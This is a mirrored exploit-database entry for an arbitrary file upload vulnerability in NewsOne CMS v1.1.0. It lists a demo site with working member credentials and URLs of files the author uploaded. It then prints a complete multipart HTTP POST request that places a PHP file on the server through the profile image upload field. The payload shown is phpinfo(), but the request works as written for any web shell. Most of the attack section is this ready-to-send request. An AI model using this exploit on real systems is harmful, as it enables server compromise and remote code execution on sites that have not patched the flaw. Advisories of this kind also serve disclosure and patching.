Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010143

Below is a copy:

NewsOne CMS News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Exploit Title: NewsOne CMS  News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Google Dork: -
# Date: 18/01/2020
# Exploit Author: m0ze
# Vendor Homepage: http://www.newsone.dx.am/index/index
# Software Link: https://codecanyon.net/item/newsone-news-magazine-blog-script/25384256
# Version: 1.1.0
# Tested on: Kali Linux
# CVE: -
# CWE: 434


----[]- Info: -[]----
Demo website: http://www.newsone.dx.am/index/index
Demo account: member/member12345 (login/password)
PoC Upload #0: http://www.newsone.dx.am/Application/Content/uploads/profile/up-up.php
PoC Upload #1: http://www.newsone.dx.am/Application/Content/uploads/profile/index.html
PoC Upload #2: http://www.newsone.dx.am/Application/Content/uploads/profile/up.phtml
PoC Upload #3: http://www.newsone.dx.am/Application/Content/uploads/profile/poc.php?m0ze&email=_your_email_here_


----[]- Arbitrary File Upload -> User Profile: -[]----
Auth as a regular user (member/member12345 for example) and upload any file you want on the http://www.newsone.dx.am/auth/edit page via <input type="file" name="user_image"> field.

PoC:

POST /auth/edit HTTP/1.1
Host: www.newsone.dx.am
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 501
Origin: http://www.newsone.dx.am
Connection: close
Referer: http://www.newsone.dx.am/auth/edit
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="member_id"

4
-----------------------------18467633426500
Content-Disposition: form-data; name="user_image"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------18467633426500
Content-Disposition: form-data; name="edit_user_photo"

Update Profile Photo
-----------------------------18467633426500--

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.